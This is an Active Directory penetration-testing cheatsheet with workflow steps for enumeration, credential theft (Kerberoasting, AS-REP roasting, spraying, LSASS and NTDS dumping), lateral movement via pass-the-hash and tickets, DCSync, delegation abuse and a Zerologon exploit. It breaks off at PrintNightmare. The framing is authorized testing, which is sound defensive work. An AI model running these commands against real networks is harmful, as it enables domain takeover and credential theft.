Active Directory Pentesting Workflow & Cheatsheet

Table of Contents

1. Pre-Engagement

2. Initial Enumeration

3. Credential Gathering

4. Lateral Movement

5. Privilege Escalation

6. Persistence

7. Domain Dominance

8. Post-Exploitation

9. Cleanup

---

Pre-Engagement

Network Discovery

Identify live hosts and open ports in the target network.

Tools: nmap, masscan, netdiscover

Why use these tools:

• nmap: Industry standard, comprehensive feature set, reliable service detection

• masscan: Extremely fast for large networks, useful for initial quick scans

• netdiscover: Passive ARP scanning, good for stealth reconnaissance

# Quick network scan
nmap -sn 192.168.1.0/24

# Comprehensive port scan
nmap -p- -sV -sC -T4 -A 192.168.1.0/24 -oA full_scan

# Fast scan with masscan
masscan -p1-65535 192.168.1.0/24 --rate=1000 -e eth0

# Identify Domain Controllers (port 389 LDAP, 88 Kerberos, 445 SMB)
nmap -p 88,389,445,636,3268,3269 192.168.1.0/24

What to do as Testing Analyst:

1. Start with a broad network sweep to identify all live hosts

2. Prioritise scanning AD-critical ports (88, 389, 445, 636, 3268, 3269)

3. Document network topology and IP ranges

4. Create an inventory of discovered systems with their roles

What to look for:

• ✅ Domain Controllers (ports 88, 389, 445, 636 open)

• ✅ File servers and member servers (port 445)

• ✅ Workstations vs Servers (different OS fingerprints)

• ✅ Open RDP ports (3389), indicating remote access

• ✅ Unusual services or non-standard ports

• ⚠️ Systems with many ports open (potential misconfigurations)

• ⚠️ Legacy systems (Windows Server 2008, 2012) - often easier targets

---

Initial Enumeration

1. DNS Enumeration

Tools: nslookup, dig, dnsrecon

Why use these tools:

• nslookup: Built-in Windows/Linux tool, good for quick queries

• dig: More detailed output than nslookup, better for automation

• dnsrecon: Automated DNS enumeration with multiple techniques

# Find domain controllers
nslookup -type=SRV _ldap._tcp.dc._msdcs.DOMAIN.LOCAL

# Zone transfer attempt
dig axfr @dns-server DOMAIN.LOCAL

# DNS enumeration
dnsrecon -d DOMAIN.LOCAL -a

What to do as Testing Analyst:

1. Identify all Domain Controllers via SRV records

2. Attempt DNS zone transfers (rarely works but worth trying)

3. Enumerate subdomains and DNS records

4. Map out DNS infrastructure

What to look for:

• ✅ DC hostnames and IP addresses from SRV records

• ✅ Successful zone transfers (HIGH severity finding)

• ✅ Internal domain structure and naming conventions

• ✅ Service records (LDAP, Kerberos, Global Catalog)

• ⚠️ Wildcard DNS entries

• ⚠️ External DNS leaking internal information

2. LDAP Enumeration

Tools: ldapsearch, windapsearch, ldapdomaindump

Why use these tools:

• ldapsearch: Standard LDAP client, works with anonymous binds

• windapsearch: Python-based, excellent for unauthenticated enumeration

• ldapdomaindump: Creates HTML reports, great for documentation

# Anonymous LDAP bind
ldapsearch -x -h 192.168.1.10 -s base namingcontexts

# Enumerate users
ldapsearch -x -h 192.168.1.10 -b "DC=DOMAIN,DC=LOCAL" "(objectClass=user)"

# Windapsearch - enumerate users
windapsearch.py -d DOMAIN.LOCAL --dc 192.168.1.10 -U

# Windapsearch - enumerate groups
windapsearch.py -d DOMAIN.LOCAL --dc 192.168.1.10 -G

# Ldapdomaindump (requires credentials)
ldapdomaindump -u 'DOMAIN\user' -p 'password' 192.168.1.10

What to do as Testing Analyst:

1. Test for anonymous LDAP bind (common misconfiguration)

2. Extract the user list for password spraying

3. Identify privileged groups and their members

4. Document organisational units (OUs) structure

5. Note user attributes (descriptions often contain passwords!)

What to look for:

• ✅ Anonymous LDAP bind enabled (MEDIUM severity - information disclosure)

• ✅ Users with "Password never expires" flag

• ✅ Disabled accounts (might have weak passwords if re-enabled)

• ✅ Service accounts (potential Kerberoasting targets)

• ✅ User descriptions containing passwords or hints

• ✅ Accounts with adminCount=1 (privileged accounts)

• ✅ Recently created accounts (potential backdoors)

• ⚠️ Large privileged groups (over-permissioned environment)

• ⚠️ Computers in wrong OUs (mismanagement)

3. SMB Enumeration

Tools: enum4linux, smbclient, smbmap, crackmapexec

Why use these tools:

• enum4linux: Comprehensive automated enumeration, all-in-one tool

• smbclient: Interactive SMB client, built-in to most Linux distros

• smbmap: Quick permission checking across multiple hosts

• crackmapexec: Multi-protocol swiss army knife, excellent for automation

# Enum4linux - comprehensive SMB enumeration
enum4linux -a 192.168.1.10

# List shares
smbclient -L //192.168.1.10 -N

# SMBMap
smbmap -H 192.168.1.10
smbmap -H 192.168.1.10 -u guest -p ""

# CrackMapExec - enumerate shares
crackmapexec smb 192.168.1.0/24 --shares

# CrackMapExec - enumerate users
crackmapexec smb 192.168.1.10 -u '' -p '' --users

# CrackMapExec - enumerate groups
crackmapexec smb 192.168.1.10 -u '' -p '' --groups

What to do as Testing Analyst:

1. Test for null sessions (unauthenticated SMB access)

2. Enumerate shares and their permissions

3. List users and groups via SMB

4. Identify the domain password policy

5. Check for SMB signing status

6. Spider shares for sensitive files

What to look for:

• ✅ Null session enabled (MEDIUM severity - information disclosure)

• ✅ Readable shares (SYSVOL, NETLOGON, custom shares)

• ✅ Writable shares (HIGH severity - potential for lateral movement)

• ✅ Password policy (lockout threshold, complexity requirements)

• ✅ SMB signing disabled (enables relay attacks)

• ✅ Guest account enabled

• ✅ Sensitive files in shares (credentials, documents, scripts)

• ⚠️ Default shares (C$, ADMIN$) accessible without credentials

• ⚠️ Backup files or old credentials in shares

4. RPC Enumeration

Tools: rpcclient, rpcinfo

Why use these tools:

• rpcclient: Powerful Windows RPC client for manual enumeration

• rpcinfo: Quick RPC service discovery

# Connect with null session
rpcclient -U "" -N 192.168.1.10

# Inside rpcclient:
enumdomusers      # Enumerate domain users
enumdomgroups     # Enumerate domain groups
queryuser <RID>   # Query user info
querygroupmem <RID>  # Query group members

# Command line enumeration
rpcclient -U "" -N 192.168.1.10 -c "enumdomusers"

What to do as Testing Analyst:

1. Test for anonymous RPC access

2. Enumerate users with detailed information (RID, descriptions)

3. Identify group memberships

4. Query password policies via RPC

5. Enumerate trusts through RPC

What to look for:

• ✅ Null session RPC access (MEDIUM severity)

• ✅ Detailed user information without authentication

• ✅ RID cycling opportunities (enumerate all users by RID)

• ✅ Group memberships for privilege escalation planning

• ✅ User flags (account disabled, password never expires)

• ⚠️ Service account patterns in usernames

• ⚠️ Lockout policy information for password spraying

5. BloodHound Enumeration

Tools: BloodHound, SharpHound

Why use these tools:

• BloodHound: Visualises AD attack paths, finds hidden relationships

• SharpHound: Data collector for BloodHound, multiple collection methods

• Essential for understanding privilege escalation paths

# Python BloodHound collector (from Linux)
bloodhound-python -d DOMAIN.LOCAL -u user -p password -ns 192.168.1.10 -c all

# SharpHound (from Windows)
.\SharpHound.exe -c all -d DOMAIN.LOCAL

# SharpHound with specified domain controller
.\SharpHound.exe -c all -d DOMAIN.LOCAL --domaincontroller DC01.DOMAIN.LOCAL

# Start BloodHound
sudo neo4j start
bloodhound

What to do as Testing Analyst:

1. Run SharpHound/bloodhound-python to collect AD data

2. Import collected JSON files into BloodHound GUI

3. Mark owned/compromised accounts as "Owned"

4. Run pre-built queries (Shortest Paths to Domain Admin)

5. Analyse custom queries for specific scenarios

6. Document all attack paths found

7. Re-run the collection after gaining new credentials

What to look for:

• ✅ Shortest path to Domain Admin from your current user

• ✅ Kerberoastable accounts (especially with admin rights)

• ✅ AS-REP Roastable accounts

• ✅ Users with local admin on multiple machines

• ✅ Dangerous ACLs (GenericAll, WriteDacl, WriteOwner)

• ✅ Unconstrained delegation computers

• ✅ Constrained delegation abuse paths

• ✅ GPO abuse opportunities

• ✅ Nested group memberships leading to privilege escalation

• ✅ Sessions - where privileged users are logged in

• ⚠️ Accounts with adminCount=1 (previously privileged)

• ⚠️ Foreign domain trust relationships

• ⚠️ Computers where Domain Admins have sessions (credential harvesting targets)

6. PowerView Enumeration (Windows)

Tools: PowerView (PowerSploit)

Why use this tool:

• PowerView: Most comprehensive PowerShell AD enumeration tool

• Uses native Windows APIs (harder to detect than LDAP queries)

• Extremely flexible with filtering and custom queries

• Essential for post-compromise enumeration from Windows hosts

# Import PowerView
Import-Module .\PowerView.ps1

# Get domain info
Get-Domain
Get-DomainController

# Enumerate users
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -Properties samaccountname,description

# Enumerate groups
Get-DomainGroup
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"

# Enumerate computers
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Find shares
Find-DomainShare

# Find GPP passwords
Get-DomainGPPPassword

# ACL enumeration
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs

What to do as Testing Analyst:

1. Enumerate the entire domain structure systematically

2. Identify privileged accounts and their properties

3. Find computers with specific OS versions (targeting legacy systems)

4. Search for accessible shares with sensitive data

5. Look for GPP passwords (old but still found)

6. Enumerate ACLs for privilege escalation opportunities

7. Find local admin access across domain computers

8. Identify trusts and forest relationships

What to look for:

• ✅ Service accounts in user descriptions or naming patterns (svc-, admin-, sql-)

• ✅ Privileged groups membership (Domain Admins, Enterprise Admins, Schema Admins)

• ✅ GPP passwords (CRITICAL if found - immediate access)

• ✅ Weak ACLs - GenericAll/GenericWrite/WriteDacl on privileged objects

• ✅ Delegation configurations - unconstrained/constrained

• ✅ Trust relationships - especially external trusts

• ✅ Shared resources with weak permissions

• ✅ Computers with old OS (Server 2008, Windows 7) - easier to exploit

• ✅ Foreign security principals in groups

• ⚠️ Accounts with SPN set (Kerberoastable)

• ⚠️ Users with "Does not require preauth" (AS-REP roastable)

• ⚠️ Service accounts in Domain Admins (common misconfiguration)

---

Credential Gathering

1. AS-REP Roasting

Target users without Kerberos pre-authentication enabled.

Tools: GetNPUsers.py (Impacket), Rubeus

Why use these tools:

• GetNPUsers.py: Works remotely without credentials, Python-based

• Rubeus: Windows-native, compiled C#, better OPSEC from compromised host

• Attacks misconfigured accounts that don't require Kerberos pre-auth

# Impacket (from Linux)
GetNPUsers.py DOMAIN.LOCAL/ -dc-ip 192.168.1.10 -request

# With username list
GetNPUsers.py DOMAIN.LOCAL/ -usersfile users.txt -dc-ip 192.168.1.10

# Rubeus (from Windows)
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt

What to do as Testing Analyst:

1. Enumerate all domain users (from previous enumeration)

2. Test each user for AS-REP roasting (or use targeted list)

3. Extract AS-REP hashes for vulnerable accounts

4. Attempt offline cracking with wordlists

5. Prioritise service accounts and admin accounts

6. Try common passwords and company-specific patterns

What to look for:

• ✅ Any vulnerable accounts found (MEDIUM severity - configuration weakness)

• ✅ Privileged accounts without pre-auth (HIGH severity)

• ✅ Service accounts without pre-auth (common misconfiguration)

• ✅ Weak passwords that crack quickly (<1 hour)

• ✅ Password patterns (Season+Year, Company+123)

• ⚠️ Accounts created recently with this setting (potential honeypot)

• 📊 Success rate: Finding even 1-2 accounts is considered successful

• 📝 Document: Which accounts, their privileges, and cracked passwords

2. Kerberoasting

Extract service account credentials.

Tools: GetUserSPNs.py (Impacket), Rubeus

Why use these tools:

• GetUserSPNs.py: Remote extraction, works with valid domain credentials

• Rubeus: Native Windows tool, can target specific SPNs

• Most effective credential attack - service accounts often have weak passwords

# Impacket (from Linux)
GetUserSPNs.py DOMAIN.LOCAL/user:password -dc-ip 192.168.1.10 -request

# Save to file
GetUserSPNs.py DOMAIN.LOCAL/user:password -dc-ip 192.168.1.10 -request -outputfile kerberoast.txt

# Rubeus (from Windows)
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Specific user
.\Rubeus.exe kerberoast /user:svcaccount /outfile:hashes.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt

# Crack with John
john --wordlist=wordlist.txt hashes.txt

What to do as Testing Analyst:

1. Request TGS tickets for all accounts with SPNs

2. Prioritise accounts based on naming (admin, sql, svc)

3. Check service account privileges using BloodHound

4. Attempt offline cracking using GPU acceleration

5. Try multiple wordlists (rockyou, corporate-specific, leaked passwords)

6. If cracking fails, try targeted rules (add year, season, etc.)

What to look for:

• ✅ High-value targets: SQL Server, IIS, Exchange service accounts

• ✅ Privileged service accounts (members of Domain Admins or similar)

• ✅ Old service accounts (likely weaker passwords)

• ✅ Accounts with RC4 encryption (faster to crack than AES)

• ✅ Successfully cracked passwords - verify access level

• ⚠️ Accounts with very strong passwords (may need to move on)

• 📊 Success metric: Even one compromised service account can lead to a domain admin

• 🎯 Priority: Service accounts in privileged groups or with admin access to servers

• 📝 Document: SPN, account name, privileges, and cracked password

3. Password Spraying

Test common passwords across multiple accounts.

Tools: crackmapexec, kerbrute, DomainPasswordSpray

Why use these tools:

• crackmapexec: Multi-protocol support, shows success immediately

• kerbrute: Uses Kerberos pre-auth (minimal logs, very stealthy)

• DomainPasswordSpray: PowerShell-based, respects lockout policies

• Low-risk technique when done correctly (avoiding lockouts)

# CrackMapExec
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123!' --continue-on-success

# Kerbrute (Kerberos-based, stealthier)
kerbrute passwordspray -d DOMAIN.LOCAL users.txt 'Password123!'

# DomainPasswordSpray (from Windows)
Invoke-DomainPasswordSpray -Password 'Password123!'

# Spray with password list
crackmapexec smb 192.168.1.10 -u users.txt -p passwords.txt --no-bruteforce

Important: Use delays and be cautious of account lockout policies!

What to do as Testing Analyst:

1. CRITICAL: First identify lockout policy (threshold and duration)

2. Calculate safe attempts (usually lockout threshold - 1)

3. Build targeted password list (Season+Year, Company123, Welcome2023)

4. Add delays between attempts (30-60 minutes recommended)

5. Monitor for successful authentications

6. Start with one password across all users

7. Document all successful credentials immediately

8. Verify account privileges after successful spray

What to look for:

• ✅ Lockout policy: Threshold, duration, observation window

• ✅ Common password patterns: Company name + year/season

• ✅ Default passwords: Password1, Welcome123, Summer2024

• ✅ Successful credentials: Even one valid account is valuable

• ✅ Account privileges: Check if compromised account has admin rights

• ⚠️ Lockout warnings: Stop immediately if accounts start locking

• ⚠️ Honeypot accounts: Accounts that authenticate but trigger alerts

• 🚨 Red flags: Immediate lockouts, defensive responses

• 📊 Success rate: 5-10% success rate is typical in weak environments

• 🎯 Timing: Early morning (users just changed expired passwords)

• 📝 Document: Passwords tested, successful credentials, timing

4. LLMNR/NBT-NS Poisoning

Capture credentials via network poisoning.

Tools: Responder, Inveigh

Why use these tools:

• Responder: Most popular tool, multi-protocol poisoning (LLMNR, NBT-NS, mDNS)

• Inveigh: PowerShell/C# version, better for Windows-based testing

• Passive attack - wait for legitimate authentication attempts

• Works well in environments with misconfigured name resolution

# Responder (from Linux)
sudo responder -I eth0 -dwPv

# Analyse mode (passive)
sudo responder -I eth0 -A

# Inveigh (from Windows)
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y

# Crack captured hashes
hashcat -m 5600 hashes.txt wordlist.txt  # NTLMv2

What to do as Testing Analyst:

1. Run Responder/Inveigh in analysis mode first (passive reconnaissance)

2. Identify frequency of LLMNR/NBT-NS traffic

3. Switch to poisoning mode during business hours for best results

4. Monitor for NTLMv2 hashes (most common)

5. Attempt to crack captured hashes offline

6. Look for privileged account hashes

7. Consider relay attacks if SMB signing is disabled

What to look for:

• ✅ NTLMv2 hashes captured (MEDIUM severity - weak protocol usage)

• ✅ NTLMv1 hashes (HIGH severity - very weak, easy to crack)

• ✅ Privileged account credentials captured

• ✅ Service account credentials (often have weak passwords)

• ✅ Frequency of poisoning events (indicates misconfiguration severity)

• ✅ Successfully cracked hashes

• ⚠️ SMB signing disabled (enables NTLM relay attacks)

• ⚠️ Repeated authentication from same host (automated service/task)

• 🎯 Best timing: During business hours when users are active

• 📊 Typical results: Capture 5-20 unique hashes in 2-4 hours

• 📝 Document: Captured hashes, accounts compromised, crack success rate

5. IPv6 Attack (mitm6)

Tools: mitm6

Why use this tool:

• mitm6: Exploits IPv6 default configuration in Windows

• Most networks have IPv6 enabled but unmonitored

• Can capture credentials and relay to LDAP for privilege escalation

# Start mitm6
sudo mitm6 -d DOMAIN.LOCAL

# Combine with ntlmrelayx for relay attacks
sudo ntlmrelayx.py -6 -t ldaps://192.168.1.10 -wh fakewpad.DOMAIN.LOCAL -l lootdir

What to do as Testing Analyst:

1. Check if IPv6 is enabled on the network

2. Run mitm6 to become the default IPv6 DNS server

3. Combine with ntlmrelayx for LDAP relay attacks

4. Wait for machines to request WPAD configuration

5. Relay captured authentication to LDAPS

6. Potentially create domain accounts or escalate privileges

What to look for:

• ✅ IPv6 enabled but unmanaged (common misconfiguration)

• ✅ WPAD requests via IPv6

• ✅ Successful authentication relays to LDAP

• ✅ Ability to create computer/user accounts

• ✅ ACL modifications via relay

• ⚠️ LDAPS not enforced (allows relay attacks)

• 🎯 Success indicator: Creating a computer account or modifying ACLs

• 📝 Document: Relay targets, accounts created, modifications made

6. Credential Dumping (Post-Compromise)

Tools: Mimikatz, pypykatz, secretsdump.py

Why use these tools:

• Mimikatz: Most comprehensive Windows credential dumping tool

• pypykatz: Pure Python implementation, useful for offline analysis

• secretsdump: Remote credential extraction via Impacket

• Essential for extracting credentials from compromised systems

# Mimikatz (from Windows with admin)
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::secrets

# Pypykatz (from Linux with lsass dump)
pypykatz lsa minidump lsass.dmp

# Secretsdump (from Linux, remote)
secretsdump.py DOMAIN/user:password@192.168.1.10

# Dump NTDS.dit
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc

What to do as Testing Analyst:

1. Elevate to local administrator or SYSTEM

2. Dump LSASS process memory for credentials

3. Extract plaintext passwords (if WDigest enabled)

4. Harvest NTLM hashes for Pass-the-Hash

5. Extract Kerberos tickets for Pass-the-Ticket

6. Dump SAM database for local accounts

7. Extract LSA secrets (service account passwords, cached credentials)

8. Look for credentials in memory of running processes

What to look for:

• ✅ Plaintext passwords in LSASS (CRITICAL if WDigest enabled)

• ✅ NTLM hashes of logged-in users

• ✅ Kerberos TGTs from privileged users

• ✅ Domain admin credentials in memory

• ✅ Service account credentials from LSA secrets

• ✅ Cached domain credentials (mscachev2)

• ✅ Credential Guard status (if enabled, limits credential access)

• ⚠️ Multiple admin sessions (high-value targets)

• ⚠️ Stale credentials (users who haven't logged in recently)

• 🎯 High-value targets: Servers, jump boxes, admin workstations

• 📝 Document: All credentials found, their source, and privileges

7. Dumping LSASS Process

Tools: procdump, comsvcs.dll, rundll32

Why use these tools:

• procdump: Sysinternals tool (Microsoft-signed, often whitelisted)

• comsvcs.dll: Native Windows DLL, fileless technique

• rundll32: Built-in Windows utility, blends with normal activity

• Necessary step before credential extraction

# Procdump
procdump.exe -ma lsass.exe lsass.dmp

# Using comsvcs.dll (native Windows)
tasklist | findstr lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\temp\lsass.dmp full

# Task Manager method
# Right-click lsass.exe -> Create dump file

What to do as Testing Analyst:

1. CRITICAL: Must have local administrator or SYSTEM privileges

2. Identify LSASS process ID (usually around 500-700)

3. Choose dumping method based on environment

4. Use procdump if Sysinternals is whitelisted

5. Use comsvcs.dll for stealthier approach (native Windows)

6. Exfiltrate dump file securely (compress and encrypt)

7. Parse offline with Mimikatz or pypykatz

8. Delete dump file after extraction

What to look for:

• ✅ Successful dump creation (~40-80MB typical size)

• ✅ AV/EDR alerts during dumping (note detection)

• ✅ Credential Guard status (prevents some credential access)

• ✅ Protected Process Light (PPL) on LSASS (requires bypass)

• ⚠️ Suspicious activity alerts from SIEM

• ⚠️ Dump file left on disk (operational security risk)

• 🚨 Red flags: Immediate system isolation, defensive responses

• 🎯 Best targets: Servers with multiple admin sessions

• 📝 Document: Method used, detection status, credentials extracted

---

Lateral Movement

1. Pass-the-Hash (PtH)

Use NTLM hash instead of password.

Tools: pth-winexe, crackmapexec, evil-winrm, psexec.py

Why use these tools:

• crackmapexec: Multi-host support, quick validation

• evil-winrm: Interactive shell via WinRM, cleaner than psexec

• psexec.py: Remote command execution, most compatible

• Core technique for lateral movement without knowing plaintext passwords

# CrackMapExec
crackmapexec smb 192.168.1.20 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Evil-WinRM
evil-winrm -i 192.168.1.20 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'

# Impacket psexec
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.20

# pth-winexe
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 //192.168.1.20 cmd

What to do as Testing Analyst:

1. Extract NTLM hashes from compromised system

2. Identify where these accounts have admin access (use crackmapexec)

3. Test hash against multiple targets

4. Prioritise Domain Admin and local administrator hashes

5. Map out all systems where you have access

6. Use for lateral movement to high-value targets

7. Document access paths for reporting

What to look for:

• ✅ Local administrator hash reuse across multiple systems

• ✅ Domain admin sessions on compromised hosts

• ✅ Service accounts with admin privileges

• ✅ Systems where hash provides access (build access map)

• ✅ High-value targets: DCs, file servers, database servers

• ⚠️ NTLM authentication blocked (rare but increasing)

• ⚠️ LAPS enabled (prevents local admin hash reuse)

• 🎯 Success path: Local admin → Domain admin hash → DC access

• 📝 Document: Hashes obtained, access gained, privilege level

2. Pass-the-Ticket (PtT)

Use Kerberos tickets for authentication.

Tools: Rubeus, Mimikatz

Why use these tools:

• Rubeus: Modern, actively maintained, comprehensive Kerberos toolkit

• Mimikatz: Original implementation, still very effective

• Avoids NTLM authentication (better OPSEC in some environments)

• Can impersonate users without knowing their password or hash

# Export tickets with Mimikatz
sekurlsa::tickets /export

# Import ticket
kerberos::ptt ticket.kirbi

# Rubeus - export tickets
.\Rubeus.exe dump

# Rubeus - pass the ticket
.\Rubeus.exe ptt /ticket:ticket.kirbi

# Verify ticket
klist

# From Linux with ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/user@target.DOMAIN.LOCAL

What to do as Testing Analyst:

1. Dump all Kerberos tickets from compromised system

2. Identify TGTs (Ticket Granting Tickets) vs TGS (Service Tickets)

3. Prioritise Domain Admin or privileged account tickets

4. Import tickets into your session

5. Use tickets for authentication to other systems

6. Look for renewable tickets (longer validity)

7. Export tickets for offline use

What to look for:

• ✅ TGTs from privileged accounts (Domain Admin, Enterprise Admin)

• ✅ Service tickets to high-value services (CIFS, LDAP, HTTP)

• ✅ Delegation tickets (can be used for further attacks)

• ✅ Ticket lifetime (how long before expiration)

• ✅ Renewable tickets (can extend validity)

• ⚠️ Expired tickets (useless, but shows past access)

• 🎯 Golden ticket scenario: Dump from DC to get krbtgt

• 📝 Document: Tickets obtained, accounts, services accessed

3. Overpass-the-Hash / Pass-the-Key

Request TGT using NTLM hash or AES key.

Tools: Rubeus, getTGT.py

Why use these tools:

• Rubeus: Versatile, supports RC4 and AES keys

• getTGT.py: Remote operation, works from Linux

• Converts NTLM authentication into Kerberos (better OPSEC)

• Useful when Kerberos is required but you only have hash

# Rubeus
.\Rubeus.exe asktgt /user:administrator /rc4:31d6cfe0d16ae931b73c59d7e0c089c0 /ptt

# With AES256 key
.\Rubeus.exe asktgt /user:administrator /aes256:key_here /ptt

# getTGT.py (Impacket)
getTGT.py DOMAIN.LOCAL/administrator -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

# Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass administrator@DC01.DOMAIN.LOCAL

What to do as Testing Analyst:

1. Extract NTLM hashes or AES keys from compromised system

2. Request TGT using the hash/key

3. Inject TGT into your session

4. Use Kerberos authentication for lateral movement

5. Prefer AES keys over RC4 (less likely to trigger alerts)

6. Combine with other techniques for full domain compromise

What to look for:

• ✅ Successful TGT requests with hash only

• ✅ AES keys available (stronger encryption, better OPSEC)

• ✅ Domain admin hashes for immediate privilege escalation

• ✅ Service account hashes for persistence

• ⚠️ RC4 downgrade attacks detected (some environments monitor this)

• 🎯 Use case: When you have hash but need Kerberos auth

• 📝 Document: Keys/hashes used, TGTs obtained, access achieved

4. PSExec / Remote Execution

Tools: psexec.py, crackmapexec, Invoke-Command

# Impacket psexec
psexec.py DOMAIN/user:password@192.168.1.20

# CrackMapExec - execute command
crackmapexec smb 192.168.1.20 -u user -p password -x "whoami"

# Upload and execute
crackmapexec smb 192.168.1.20 -u user -p password -X '$x=Get-Content payload.ps1; IEX $x'

# PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName target -Credential $cred

# Invoke-Command
Invoke-Command -ComputerName target -ScriptBlock { whoami } -Credential $cred

5. WMI Execution

Tools: wmiexec.py, Invoke-WmiMethod

# Impacket wmiexec
wmiexec.py DOMAIN/user:password@192.168.1.20

# With hash
wmiexec.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 administrator@192.168.1.20

# PowerShell WMI
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c calc.exe" -ComputerName target

6. DCOM Execution

# MMC20.Application
$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.20"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","Minimized")

# ShellWindows
$com = [Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","192.168.1.20"))
$com.item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)

---

Privilege Escalation

1. ACL Abuse

Tools: PowerView, BloodHound

# Find interesting ACLs
Get-ObjectAcl -SamAccountName "user" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}

# Add user to group (GenericAll on group)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'

# Change user password (ForceChangePassword)
$pass = ConvertTo-SecureString 'NewPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity targetuser -AccountPassword $pass

# Grant DCSync rights (WriteDacl on domain)
Add-DomainObjectAcl -TargetIdentity "DC=DOMAIN,DC=LOCAL" -PrincipalIdentity user -Rights DCSync

2. DCSync Attack

Replicate password hashes from Domain Controller.

Tools: Mimikatz, secretsdump.py

Why use these tools:

• Mimikatz: Original DCSync implementation, works locally

• secretsdump: Remote DCSync via Impacket, works from Linux

• CRITICAL TECHNIQUE: Extracts ALL domain password hashes

• Requires Replicating Directory Changes permission

# Mimikatz
lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator
lsadump::dcsync /domain:DOMAIN.LOCAL /all

# Secretsdump
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc

# Specific user
secretsdump.py DOMAIN/user:password@192.168.1.10 -just-dc-user administrator

What to do as Testing Analyst:

1. Prerequisites: Need account with DCSync rights (DA, or custom permissions)

2. Target the krbtgt account first (enables Golden Ticket)

3. Extract administrator and high-value account hashes

4. Dump all hashes for comprehensive analysis (-just-dc flag)

5. Save output securely for offline cracking

6. Document the ability to perform DCSync (CRITICAL finding)

What to look for:

• ✅ Successful DCSync (CRITICAL - equivalent to Domain Admin)

• ✅ krbtgt hash obtained (enables Golden Ticket attacks)

• ✅ All domain admin hashes

• ✅ Service account hashes for persistence

• ✅ Historical password data (previous passwords)

• ✅ Accounts with DCSync rights (for reporting)

• ⚠️ Detection: DCSync generates 4662 events (monitor for alerts)

• 🎯 This is GAME OVER: Full domain compromise achieved

• 📝 Document: Ability to DCSync, accounts extracted, krbtgt hash

• 🚨 Report as CRITICAL: Immediate domain admin equivalent access

3. Kerberos Delegation Abuse

Unconstrained Delegation

Tools: Rubeus, findDelegation.py

# Find computers with unconstrained delegation
Get-DomainComputer -Unconstrained

# Monitor for tickets
.\Rubeus.exe monitor /interval:5

# After compromise, extract tickets
.\Rubeus.exe dump

# findDelegation.py (Impacket)
findDelegation.py DOMAIN/user:password -dc-ip 192.168.1.10

Constrained Delegation

# Find constrained delegation
Get-DomainComputer -TrustedToAuth
Get-DomainUser -TrustedToAuth

# Rubeus - request TGT
.\Rubeus.exe tgtdeleg

# Request service ticket for delegation
.\Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.DOMAIN.LOCAL /ptt

4. Resource-Based Constrained Delegation (RBCD)

Tools: PowerView, Rubeus

# Check msDS-AllowedToActOnBehalfOfOtherIdentity
Get-DomainComputer target | select msds-allowedtoactonbehalfofotheridentity

# Set RBCD (requires GenericAll/GenericWrite on target)
$TargetComputer = Get-DomainComputer target
$AttackerSID = Get-DomainComputer attacker -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($AttackerSID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer target | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Exploit with Rubeus
.\Rubeus.exe s4u /user:attacker$ /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.DOMAIN.LOCAL /ptt

5. Group Policy Preferences (GPP) Passwords

Tools: Get-GPPPassword, gpp-decrypt

# PowerView
Get-DomainGPPPassword

# Manual search
findstr /S /I cpassword \\DOMAIN.LOCAL\sysvol\*.xml

# Decrypt GPP password
gpp-decrypt "encrypted_password"

6. Zerologon (CVE-2020-1472)

Tools: zerologon_tester.py

# Test vulnerability
python3 zerologon_tester.py DC01 192.168.1.10

# Exploit (use with caution!)
python3 cve-2020-1472-exploit.py DC01 192.168.1.10

# Restore DC password after exploitation
python3 restorepassword.py DOMAIN/DC01@DC01.DOMAIN.LOCAL -target-ip 192.168.1.10 -hexpass <original_hash>

7. PrintNightmare (CVE-2021-1675)

Tools: rpcdump.py, CVE-2021-1675.py

# Check if vulnerable
